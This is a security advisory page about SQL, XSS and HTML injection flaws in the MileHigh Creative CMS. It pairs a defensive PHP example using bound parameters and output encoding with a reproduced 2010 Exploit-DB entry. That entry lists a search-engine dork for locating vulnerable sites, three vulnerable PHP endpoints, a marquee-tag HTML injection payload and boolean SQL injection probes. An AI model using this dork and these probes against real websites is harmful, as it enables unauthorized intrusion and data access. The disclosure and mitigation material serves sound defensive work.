Vendor: MileHigh Creative
By: XroGuE
CVSS: 8.8 (HIGH)
Type: SQL/XSS/HTML Injection
CWE: 89, 79, 80
Product Name: MileHigh Creative
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities

MileHigh Creative is vulnerable to multiple injection vulnerabilities, including SQL, XSS, and HTML injection. An attacker can exploit these vulnerabilities by crafting malicious input and sending it to the vulnerable application. This can allow the attacker to gain access to sensitive information, execute arbitrary code, and modify the application's data.

Mitigation:

The application should validate input and reject malicious values before processing them. It should also use parameterized queries to prevent SQL injection.
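
The mitigation above, applied to an integer parameter such as the `parentId` of `contentFolder.php`, as an added example (not the vendor's code and not part of the original advisory). The `pages` table, its columns, and the functions `parseId` and `renderFolder` are hypothetical, and the sample rows are constructed; the example also encodes values on output, which covers the XSS and HTML injection classes listed.

```php
<?php
// Added example: hardened handling of an integer request parameter.
// Table, column and function names are hypothetical; sample rows are constructed.

// In-memory SQLite database so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, parent_id INTEGER, title TEXT)');
$db->exec("INSERT INTO pages (parent_id, title) VALUES (1, 'About <us>'), (1, 'Services'), (2, 'Contact')");

// Accept only a positive integer; return null for anything else.
function parseId($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Render the titles under a parent page. Returns [HTTP status, HTML body].
function renderFolder(PDO $db, $rawParentId): array
{
    $parentId = parseId($rawParentId);
    if ($parentId === null) {
        // Reject with a fixed message; never echo the bad value back.
        return [400, "<p>Invalid parentId.</p>\n"];
    }

    // Bound parameter: the value never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT title FROM pages WHERE parent_id = :pid ORDER BY id');
    $stmt->bindValue(':pid', $parentId, PDO::PARAM_INT);
    $stmt->execute();

    $html = "<ul>\n";
    foreach ($stmt->fetchAll(PDO::FETCH_COLUMN) as $title) {
        // Encode on output so markup in the data is displayed as text.
        $html .= '  <li>' . htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</li>\n";
    }
    return [200, $html . "</ul>\n"];
}

// Constructed inputs: a valid id, then the two demo values quoted in the
// advisory ("+" in the demo URL decodes to a space).
$inputs = ['1', '1 and 1=1', '<marquee><font color=Blue size=15>XroGuE</font></marquee>'];
foreach ($inputs as $raw) {
    [$status, $body] = renderFolder($db, $raw);
    echo 'input: ', json_encode($raw), " -> HTTP $status\n$body\n";
}
```

Only the first input returns a list; the other two are rejected with HTTP 400 before any query runs, and the stored title `About <us>` is emitted as `About &lt;us&gt;`.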

Exploit-DB raw data:

=======================================================================
# MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities
=======================================================================
[+] Site : Inj3ct0r.com (exploit database separated by exploit type: local, remote, DoS, etc.)
[+] Support e-mail : submit[at]inj3ct0r.com

I'm XroGuE member from Inj3ct0r Team

########################################################################
# Name: MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities
# Vendor: http://www.milehighcreative.com
# Date: 2010-05-29
# Author: XroGuE
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
########################################################################

[+] Dork: inurl:"contentPage.php?id=" & inurl:"displayResource.php?id=" & ...
intext:"Website by Mile High Creative"


[+] Vulnerabilities:

contentPage.php
contentFolder.php
displayResource.php


[+] XSS InjecTion Vulnerability:


[+] Demo:
http://server/contentPage.php?id=
http://server/displayResource.php?id=
http://server/contentFolder.php?parentId=

0R

http://server/contentPage.php?id=
http://server/displayResource.php?id=
http://server/contentFolder.php?parentId=

########################################################################

[+] HTML InjecTion Vulnerability:
[+] Demo: http://server/contentPage.php?id=<marquee><font color=Blue size=15>XroGuE</font></marquee>

########################################################################

[+] SQL InjecTion Vulnerability:
[+] Demo: http://server/contentFolder.php?parentId=1+and+1=1 [and+1=2]


########################################################################